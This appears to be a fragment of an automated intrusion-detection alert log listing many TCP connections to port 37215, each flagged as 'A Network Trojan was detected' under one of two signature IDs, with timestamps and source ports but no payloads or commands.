              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079880
              SID:2829579
              Source Port:34314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579625
              SID:2835222
              Source Port:48042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245334
              SID:2835222
              Source Port:57714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055582
              SID:2829579
              Source Port:46174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075474
              SID:2829579
              Source Port:47076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130198
              SID:2835222
              Source Port:37040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188171
              SID:2835222
              Source Port:36834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574501
              SID:2835222
              Source Port:43104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166809
              SID:2835222
              Source Port:38188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634643
              SID:2835222
              Source Port:59840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116540
              SID:2829579
              Source Port:39040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099860
              SID:2835222
              Source Port:52266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636621
              SID:2835222
              Source Port:58232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513485
              SID:2829579
              Source Port:35152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355001
              SID:2829579
              Source Port:55922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591593
              SID:2835222
              Source Port:53122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458391
              SID:2835222
              Source Port:40766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692531
              SID:2835222
              Source Port:34186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114739
              SID:2829579
              Source Port:35540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200714
              SID:2829579
              Source Port:46866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061477
              SID:2829579
              Source Port:32930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360989
              SID:2829579
              Source Port:41436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870198
              SID:2835222
              Source Port:54052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882731
              SID:2829579
              Source Port:59286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111437
              SID:2829579
              Source Port:57640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411877
              SID:2835222
              Source Port:48410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204421
              SID:2835222
              Source Port:53054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432320
              SID:2829579
              Source Port:36460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247821
              SID:2829579
              Source Port:33260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.865448
              SID:2835222
              Source Port:35292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.832425
              SID:2829579
              Source Port:52036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685200
              SID:2829579
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286846
              SID:2835222
              Source Port:53284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128176
              SID:2835222
              Source Port:55814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545588
              SID:2835222
              Source Port:35532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233906
              SID:2835222
              Source Port:44618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365342
              SID:2829579
              Source Port:35328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.369633
              SID:2835222
              Source Port:43058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459543
              SID:2829579
              Source Port:48824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537236
              SID:2829579
              Source Port:36970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119515
              SID:2835222
              Source Port:46346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814729
              SID:2829579
              Source Port:42212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105596
              SID:2835222
              Source Port:53520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121350
              SID:2835222
              Source Port:52678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621660
              SID:2835222
              Source Port:42546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.827805
              SID:2835222
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872352
              SID:2829579
              Source Port:47096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425521
              SID:2835222
              Source Port:54096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692506
              SID:2829579
              Source Port:39040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099801
              SID:2835222
              Source Port:54722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724916
              SID:2835222
              Source Port:43298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622944
              SID:2835222
              Source Port:56338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633558
              SID:2835222
              Source Port:51328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188649
              SID:2835222
              Source Port:40766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535527
              SID:2835222
              Source Port:39604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625293
              SID:2835222
              Source Port:52190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201676
              SID:2829579
              Source Port:54340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535263
              SID:2835222
              Source Port:49898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460526
              SID:2829579
              Source Port:46892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548261
              SID:2835222
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630738
              SID:2835222
              Source Port:40564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059510
              SID:2835222
              Source Port:45278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797291
              SID:2835222
              Source Port:42296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435302
              SID:2835222
              Source Port:59958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481600
              SID:2829579
              Source Port:49144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707110
              SID:2829579
              Source Port:36848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539351
              SID:2835222
              Source Port:49438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545588
              SID:2835222
              Source Port:55236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866431
              SID:2829579
              Source Port:45180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278819
              SID:2835222
              Source Port:49768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872382
              SID:2829579
              Source Port:52432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878345
              SID:2835222
              Source Port:40528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278764
              SID:2835222
              Source Port:39622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280335
              SID:2829579
              Source Port:38198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120439
              SID:2829579
              Source Port:40116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411180
              SID:2829579
              Source Port:44932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281494
              SID:2829579
              Source Port:33710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063910
              SID:2835222
              Source Port:44432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446897
              SID:2835222
              Source Port:35906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.074030
              SID:2829579
              Source Port:34470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411152
              SID:2829579
              Source Port:42018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871679
              SID:2835222
              Source Port:53248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063750
              SID:2835222
              Source Port:53516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154332
              SID:2835222
              Source Port:58442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573427
              SID:2835222
              Source Port:59864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372548
              SID:2835222
              Source Port:34074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574413
              SID:2835222
              Source Port:56862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982041
              SID:2835222
              Source Port:49918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661883
              SID:2829579
              Source Port:55714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078693
              SID:2829579
              Source Port:53502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662603
              SID:2835222
              Source Port:54394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345440
              SID:2835222
              Source Port:56492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152853
              SID:2829579
              Source Port:33550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207614
              SID:2829579
              Source Port:44300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859526
              SID:2835222
              Source Port:54954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361284
              SID:2835222
              Source Port:33268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502742
              SID:2835222
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797697
              SID:2835222
              Source Port:60148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536469
              SID:2835222
              Source Port:55190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061484
              SID:2829579
              Source Port:53642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727035
              SID:2835222
              Source Port:45368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695794
              SID:2829579
              Source Port:56874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.122552
              SID:2835222
              Source Port:54400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543670
              SID:2829579
              Source Port:44012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.877868
              SID:2835222
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594496
              SID:2829579
              Source Port:40970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066243
              SID:2829579
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430560
              SID:2829579
              Source Port:46492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061892
              SID:2835222
              Source Port:36838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368613
              SID:2829579
              Source Port:38550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369042
              SID:2835222
              Source Port:43444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230891
              SID:2835222
              Source Port:57726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053618
              SID:2835222
              Source Port:50128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431492
              SID:2835222
              Source Port:49464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116562
              SID:2835222
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396220
              SID:2835222
              Source Port:49774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638724
              SID:2835222
              Source Port:56836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425913
              SID:2829579
              Source Port:41144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349913
              SID:2829579
              Source Port:50052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797259
              SID:2835222
              Source Port:51556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377698
              SID:2835222
              Source Port:58770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726065
              SID:2835222
              Source Port:59460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.773231
              SID:2835222
              Source Port:49458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450402
              SID:2835222
              Source Port:48404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281700
              SID:2835222
              Source Port:41934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055471
              SID:2835222
              Source Port:58718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168601
              SID:2835222
              Source Port:52688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507182
              SID:2835222
              Source Port:41544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116640
              SID:2829579
              Source Port:35036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502877
              SID:2835222
              Source Port:59302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604586
              SID:2829579
              Source Port:50812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398216
              SID:2829579
              Source Port:42000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482381
              SID:2829579
              Source Port:40744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458329
              SID:2829579
              Source Port:46808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127530
              SID:2835222
              Source Port:42954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570666
              SID:2835222
              Source Port:47412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409228
              SID:2835222
              Source Port:59678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763254
              SID:2835222
              Source Port:33042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054013
              SID:2829579
              Source Port:46090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118556
              SID:2829579
              Source Port:59524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857369
              SID:2835222
              Source Port:37580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313585
              SID:2835222
              Source Port:57162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368793
              SID:2829579
              Source Port:50450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329768
              SID:2829579
              Source Port:32898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460481
              SID:2835222
              Source Port:54072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060740
              SID:2829579
              Source Port:38368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.762019
              SID:2835222
              Source Port:34346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.062989
              SID:2835222
              Source Port:57888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169318
              SID:2835222
              Source Port:37258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663724
              SID:2835222
              Source Port:49590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486940
              SID:2829579
              Source Port:41628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724751
              SID:2835222
              Source Port:52618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.580016
              SID:2829579
              Source Port:54304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880393
              SID:2835222
              Source Port:50222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406573
              SID:2829579
              Source Port:42130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446690
              SID:2829579
              Source Port:58562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117308
              SID:2829579
              Source Port:34826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534838
              SID:2829579
              Source Port:54950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591564
              SID:2829579
              Source Port:43566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802129
              SID:2835222
              Source Port:44860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486973
              SID:2829579
              Source Port:38366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570616
              SID:2835222
              Source Port:43074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.105023
              SID:2835222
              Source Port:56532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884590
              SID:2829579
              Source Port:41294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920669
              SID:2829579
              Source Port:58144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079761
              SID:2835222
              Source Port:35766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341089
              SID:2835222
              Source Port:36150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456202
              SID:2835222
              Source Port:52370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503696
              SID:2829579
              Source Port:42274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634116
              SID:2835222
              Source Port:52350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100594
              SID:2835222
              Source Port:51394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435294
              SID:2829579
              Source Port:58878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661870
              SID:2829579
              Source Port:55604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551735
              SID:2835222
              Source Port:34446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103715
              SID:2835222
              Source Port:35970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040319
              SID:2835222
              Source Port:44128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268553
              SID:2829579
              Source Port:44190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061445
              SID:2835222
              Source Port:45354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589037
              SID:2835222
              Source Port:41482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122172
              SID:2835222
              Source Port:33736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.059992
              SID:2835222
              Source Port:40532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245326
              SID:2829579
              Source Port:40658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063188
              SID:2835222
              Source Port:38388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249924
              SID:2835222
              Source Port:42530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333823
              SID:2829579
              Source Port:42786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188121
              SID:2835222
              Source Port:60780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586050
              SID:2829579
              Source Port:51582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270407
              SID:2835222
              Source Port:56158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802194
              SID:2829579
              Source Port:40818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694708
              SID:2829579
              Source Port:33046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480866
              SID:2835222
              Source Port:51896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538647
              SID:2835222
              Source Port:38064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537538
              SID:2829579
              Source Port:36240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484385
              SID:2829579
              Source Port:55736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624829
              SID:2835222
              Source Port:42302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113479
              SID:2829579
              Source Port:51106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155662
              SID:2835222
              Source Port:50542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
